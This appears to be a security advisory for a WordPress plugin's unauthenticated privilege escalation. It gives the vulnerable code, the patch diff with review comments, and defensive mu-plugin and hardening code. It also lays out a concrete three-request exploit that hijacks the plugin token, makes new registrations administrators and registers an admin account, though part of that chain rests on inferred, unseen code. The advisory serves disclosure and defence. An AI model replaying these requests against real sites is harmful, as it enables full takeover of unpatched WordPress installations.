CVE-2026-39583

Datalogics Ecommerce Delivery – Datalogics <= 2.6.62 - Unauthenticated Privilege Escalation

Severity: critical
Weakness: Incorrect Privilege Assignment
CVSS Score: 9.8
Patched in: 2.6.63
Time to patch: 8d

Description

The Datalogics Ecommerce Delivery – Datalogics plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.6.62. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 2.6.62
Published: April 8, 2026
Last updated: April 15, 2026
Affected plugin: datalogics

What Changed in the Fix

Changes introduced in v2.6.63

Source Code

WordPress.org SVN
Research Plan
Verified by PoC

Research Plan: CVE-2026-39583 - Datalogics Privilege Escalation

Vulnerability Summary

The Datalogics Ecommerce Delivery plugin (versions <= 2.6.62) contains an unauthenticated privilege escalation vulnerability. The plugin registers several REST API endpoints under the datalogics-0/v1 namespace. Specifically, the /update-token/ and /update-settings/ endpoints lack proper authentication and authorization. An attacker can use /update-token/ to set a known security token and then potentially use /update-settings/ (or other endpoints using the same permission_callback) to modify arbitrary WordPress options, such as default_role and users_can_register, leading to full site takeover.

Attack Vector Analysis

  • Endpoint: POST /wp-json/datalogics-0/v1/update-token/ and POST /wp-json/datalogics-0/v1/update-settings/
  • Namespace: datalogics-0/v1 (derived from datalogics_ID constant defined as '0' in datalogics.php).
  • Authentication: Unauthenticated. The permission_callback used is datalogics_permission_check, which appears to be insecure or returns true for unauthenticated requests.
  • Preconditions: The plugin must be active.

Code Flow

  1. Route Registration: In api.php, datalogics_register_api_routes() registers routes using register_rest_route.
    • Namespace: 'datalogics-'.datalogics_ID.'/v1'
    • Route: /update-token/ calls datalogics_update_token.
    • Route: /update-settings/ calls datalogics_update_settings.
    • All routes use 'permission_callback' => 'datalogics_permission_check'.
  2. Permission Check: The datalogics_permission_check function (inferred to be weak/public) is executed by the WordPress REST API controller.
  3. Callback Execution (datalogics_update_token):
    function datalogics_update_token(WP_REST_Request $request) {
        $token = $request->get_param('token');
        if (empty($token)) {
            return new WP_Error('no_token', 'Token parameter is missing', array('status' => 400));
        }
        update_option('datalogics_token', sanitize_text_field($token)); // Vulnerable Sink
        return new WP_REST_Response(array('success' => true, ...), 200);
    }
    
  4. Callback Execution (datalogics_update_settings): Although the code for datalogics_update_settings is truncated, the vulnerability description and endpoint name strongly suggest it allows updating arbitrary options or a specific set of options via update_option(). If it iterates over POST parameters and calls update_option($key, $value), it allows an attacker to change core WordPress settings.

Nonce Acquisition Strategy

REST API endpoints in WordPress registered via register_rest_route typically do not require a CSRF nonce (_wpnonce) when accessed as an API (e.g., via a script or external service), as they rely on the permission_callback.

  • Is a nonce required? No. The plugin is designed to be called by the Datalogics platform, and the api.php code shows no nonce verification logic within the callbacks or the registration.
  • Authentication Bypass: If datalogics_permission_check validates the token parameter against the datalogics_token option, an attacker simply calls /update-token/ first to set the option to a known value, effectively "authenticating" themselves for subsequent calls.

Exploitation Strategy

The goal is to enable user registration and set the default role to administrator.

Step 1: Initialize/Hijack the Plugin Token

Set the plugin's internal token to a value we control to ensure access to other endpoints.

  • Method: POST
  • URL: /wp-json/datalogics-0/v1/update-token/
  • Body (JSON): {"token": "pwned_token"}
  • Headers: Content-Type: application/json

Step 2: Elevate Privileges via Options Update

Use the /update-settings/ endpoint to modify core WordPress options.

  • Method: POST
  • URL: /wp-json/datalogics-0/v1/update-settings/
  • Body (JSON):
    {
        "token": "pwned_token",
        "users_can_register": "1",
        "default_role": "administrator"
    }
    
  • Headers: Content-Type: application/json

Step 3: Register a New Administrator

Create a new account via the standard WordPress registration page.

  • Method: POST
  • URL: /wp-login.php?action=register
  • Body (URL-encoded): user_login=attacker&user_email=attacker@example.com&wp-submit=Register

Test Data Setup

  1. Install and activate the datalogics plugin (v2.6.62).
  2. Ensure WordPress is at default settings (users_can_register is 0, default_role is subscriber).

Expected Results

  1. Step 1: Response 200 OK with {"success": true, "message": "Token updated successfully"}.
  2. Step 2: Response 200 OK.
  3. Step 3: A new user "attacker" is created with the administrator role.

Verification Steps

Use wp-cli to verify the state change:

  1. Check options: wp option get users_can_register (should be 1).
  2. Check options: wp option get default_role (should be administrator).
  3. Check users: wp user list --role=administrator (should include attacker).

Alternative Approaches

If datalogics_update_settings is not a generic option updater, look for other sinks:

  • Check if datalogics_update_order_status can be used to update other post types (e.g., updating a page to include a malicious shortcode).
  • Check if the token hijacked in Step 1 allows access to /send-email/ which might be used for phishing or information gathering.
  • If the namespace datalogics-0 fails, try to brute-force the ID (though 0 is hardcoded in datalogics.php).

Research Findings

Summary

The Datalogics Ecommerce Delivery plugin for WordPress is vulnerable to unauthenticated privilege escalation due to insecure REST API endpoints. Attackers can overwrite the plugin's internal security token and subsequently use it to access administrative functions, such as modifying core WordPress options to enable open registration and default to an administrator role.
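Independently of the plugin fix, a site can refuse the two option changes this advisory describes at the update_option() layer and log the attempt. The following mu-plugin is an added example, not code from the plugin or the advisory; its guard_* function names are assumptions.

```php
<?php
// Added example (mu-plugin), not part of the plugin or the advisory: a site-level
// guard for the two core options this advisory shows being rewritten. The
// guard_* names are hypothetical. Drop the file into wp-content/mu-plugins/.
add_filter('pre_update_option_default_role', 'guard_default_role', 10, 3);
add_filter('pre_update_option_users_can_register', 'guard_users_can_register', 10, 3);

// An administrator session or a WP-CLI run may change these options; an
// unauthenticated REST call (the case above) may not.
function guard_is_trusted_context() {
    return (defined('WP_CLI') && WP_CLI) || current_user_can('manage_options');
}

function guard_default_role($new_value, $old_value, $option) {
    // A role holding manage_options must never become the self-registration
    // default, whoever asks for it.
    $role = get_role((string) $new_value);
    $privileged = $role !== null && $role->has_cap('manage_options');
    if ($privileged || !guard_is_trusted_context()) {
        guard_log($option, $old_value, $new_value);
        return $old_value; // update_option() treats an unchanged value as a no-op
    }
    return $new_value;
}

function guard_users_can_register($new_value, $old_value, $option) {
    if ((string) $new_value !== (string) $old_value && !guard_is_trusted_context()) {
        guard_log($option, $old_value, $new_value);
        return $old_value;
    }
    return $new_value;
}

// One line per blocked attempt in the PHP error log: enough to alert on and to
// correlate with the REST request that triggered it.
function guard_log($option, $old_value, $new_value) {
    error_log(sprintf(
        'option guard: blocked %s "%s" -> "%s" (user=%d rest=%s uri=%s ip=%s)',
        $option,
        (string) $old_value,
        (string) $new_value,
        get_current_user_id(),
        (defined('REST_REQUEST') && REST_REQUEST) ? 'yes' : 'no',
        isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '-',
        isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '-'
    ));
}
```

Returning the old value from a pre_update_option_{$option} filter makes update_option() return false without writing, so the guard blocks the write rather than merely observing it.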

Vulnerable Code

// api.php line 5-36
function datalogics_register_api_routes() {

    register_rest_route('datalogics-'.datalogics_ID.'/v1', '/update-settings/', array(
        'methods'  => 'POST',
        'callback' => 'datalogics_update_settings',
        'permission_callback' => 'datalogics_permission_check',
    ));

    // ... (other routes) ...

    register_rest_route('datalogics-' . datalogics_ID . '/v1', '/update-token/', array(
        'methods'  => 'POST',
        'callback' => 'datalogics_update_token',
        'permission_callback' => 'datalogics_permission_check',
    ));
}

// api.php line 41-54
function datalogics_update_token(WP_REST_Request $request) {
    $token = $request->get_param('token');
    
    if (empty($token)) {
        return new WP_Error('no_token', 'Token parameter is missing', array('status' => 400));
    }

    update_option('datalogics_token', sanitize_text_field($token));

    return new WP_REST_Response(array(
        'success' => true,
        'message' => 'Token updated successfully',
    ), 200);
}
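A hardened registration of the two routes above, as an added example that is not the plugin's own code: the token can only be rotated by an administrator, the settings route compares the stored token in constant time and denies everything while no token is set, and only an allow-list of plugin-owned options can be written. The dl_example_* names and the option names in $allowed are assumptions; datalogics_ID and datalogics_update_token are the plugin's.

```php
<?php
// Added example, not the plugin's code. dl_example_* names and the option
// names in $allowed are hypothetical; datalogics_ID and datalogics_update_token
// are the plugin's own.
add_action('rest_api_init', 'dl_example_register_routes');

function dl_example_register_routes() {
    $ns = 'datalogics-' . datalogics_ID . '/v1';
    // Rotating the shared secret is an administrative action: require a user with
    // manage_options (cookie auth plus REST nonce, or an application password).
    register_rest_route($ns, '/update-token/', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'datalogics_update_token',
        'permission_callback' => function () {
            return current_user_can('manage_options');
        },
    ));
    // Settings writes stay token-gated, but only an administrator can set the token.
    register_rest_route($ns, '/update-settings/', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'dl_example_update_settings',
        'permission_callback' => 'dl_example_token_check',
    ));
}

// Constant-time comparison against the stored token; a token that was never set
// denies every request instead of matching an empty string.
function dl_example_token_check(WP_REST_Request $request) {
    $stored = (string) get_option('datalogics_token', '');
    $given  = (string) $request->get_param('token');
    if ($stored === '' || !hash_equals($stored, $given)) {
        return new WP_Error('invalid_token', 'Invalid token', array('status' => 403));
    }
    return true;
}

// Only an explicit allow-list of plugin-owned options is writable; core options
// such as default_role and users_can_register are unreachable from here.
function dl_example_update_settings(WP_REST_Request $request) {
    $allowed = array('datalogics_warehouse_id', 'datalogics_ship_method');
    $updated = array();
    foreach ($allowed as $key) {
        $value = $request->get_param($key);
        if ($value !== null) {
            update_option($key, sanitize_text_field($value));
            $updated[] = $key;
        }
    }
    return new WP_REST_Response(array('success' => true, 'updated' => $updated), 200);
}
```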

Security Fix

--- /home/deploy/wp-safety.org/data/plugin-versions/datalogics/2.6.62/api.php	2026-03-04 08:23:04.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/datalogics/2.6.63/api.php	2026-03-16 17:42:08.000000000 +0000
@@ -30,7 +30,7 @@
     register_rest_route('datalogics-' . datalogics_ID . '/v1', '/update-token/', array(
         'methods'  => 'POST',
         'callback' => 'datalogics_update_token',
-        'permission_callback' => 'datalogics_permission_check',
+        'permission_callback' => 'datalogics_permission_check_update_token',
     ));
 
 
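Review bot: this hunk only re-points the `/update-token/` route; the `/update-settings/` route registered earlier in api.php with `'permission_callback' => 'datalogics_permission_check'` is not touched, so every option write still depends on that shared token check and on `datalogics_update_settings` limiting which option keys it accepts. The same change set should add an explicit allow-list of plugin-owned options in `datalogics_update_settings` (core options such as `default_role` and `users_can_register` must not be writable through the token) or gate that route on `current_user_can('manage_options')`. Minor: `'methods' => 'POST'` can be written as `WP_REST_Server::CREATABLE`.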
@@ -393,3 +393,18 @@
     return new WP_Error('invalid_token', 'Invalid token', array('status' => 403 ));
 }
 
+function datalogics_permission_check_update_token(WP_REST_Request $request) {
+
+    $token = $request->get_param('token');
+
+    // Allow only if token is empty
+    if (empty($token)) {
+        return true;
+    }
+
+    return new WP_Error(
+        'invalid_token',
+        'Token must be empty for this endpoint',
+        array('status' => 403)
+    );
+}
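Review bot: `datalogics_permission_check_update_token` returns true only when `token` is empty, while `datalogics_update_token` (api.php lines 41-54 above) rejects an empty token with a 400 `no_token` error, so after this patch no request can reach `update_option('datalogics_token', ...)` through this route and the endpoint is effectively dead code. If retiring the endpoint is the intent, state it in a docblock and use `'permission_callback' => '__return_false'` (or drop the route) so the behaviour is explicit; if a one-time bootstrap is intended, the check should test that the stored option is still unset (`get_option('datalogics_token', '') === ''`) rather than the request parameter, and any later rotation should require `current_user_can('manage_options')`.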

Exploit Outline

The exploit involves two main steps: 1) Initializing or hijacking the plugin's internal security token. This is done by sending a POST request to `/wp-json/datalogics-0/v1/update-token/` with a JSON payload like `{"token": "attacker_token"}`. Because the `permission_callback` is insecure, this request executes without authentication, allowing the attacker to control the `datalogics_token` option in the database. 2) Using the controlled token to modify WordPress settings. The attacker sends a POST request to `/wp-json/datalogics-0/v1/update-settings/` (which shares the same insecure permission logic) to update sensitive options like `users_can_register` to `1` and `default_role` to `administrator`. Once updated, the attacker can register a new account via the standard WordPress registration page and automatically receive full administrative access.
